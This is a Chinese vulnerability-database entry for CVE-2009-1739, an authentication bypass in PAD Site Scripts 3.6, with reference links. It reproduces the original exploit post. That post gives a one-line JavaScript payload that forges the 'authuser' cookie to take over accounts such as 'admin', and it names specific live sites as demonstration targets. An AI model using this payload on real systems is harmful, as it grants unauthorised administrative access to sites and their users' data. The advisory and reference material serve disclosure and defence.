Phpeasycode PAD Site Scripts authuser cookie输入验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117799 漏洞类型 输入验证
发布时间 2009-05-19 更新时间 2009-06-09
CVE编号 CVE-2009-1739 CNNVD-ID CNNVD-200905-254
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8735
https://cxsecurity.com/issue/WLB-2009050187
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-254
|漏洞详情
PADSiteScripts是一个商业的PHP脚本,用于维护用于Windows软件下载网站。PADSiteScripts3.6版本允许远程攻击者通过设置authusercookie参数到一个有效的用户名,绕过认证权限并获得像其他用户一样的特权。
|漏洞EXP
=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :PAD Site Scripts v3.6 Insecure Cookie Handling Vulnerability

[+] Found by : Mr.tro0oqy  
   
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
javascript:document.cookie="authuser=[demo];path=/";

[demo]= Guess the username to the login

demo:
-----
Username for this site 'demo'

javascript:document.cookie="authuser=demo;path=/";

http://demo.pad-site-scripts.com/sysop

demo2:
------
Username for this site 'admin'

javascript:document.cookie="authuser=admin;path=/";

http://www.unlimitedpcdownloads.com/sysop/


=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
ThE g0bL!N - spyboy - red virus - virus_hima - Red-D3v1L
Cyb3r-DeViL- OXIDE

Syriahacker.net [ArAb Acadmy Security]  

all my Friends

# milw0rm.com [2009-05-19]
|参考资料

来源:XF
名称:padsite-cookie-security-bypass(50622)
链接:http://xforce.iss.net/xforce/xfdb/50622
来源:BID
名称:35027
链接:http://www.securityfocus.com/bid/35027
来源:MILW0RM
名称:8735
链接:http://www.milw0rm.com/exploits/8735
来源:SECUNIA
名称:35155
链接:http://secunia.com/advisories/35155
来源:OSVDB
名称:54593
链接:http://osvdb.org/54593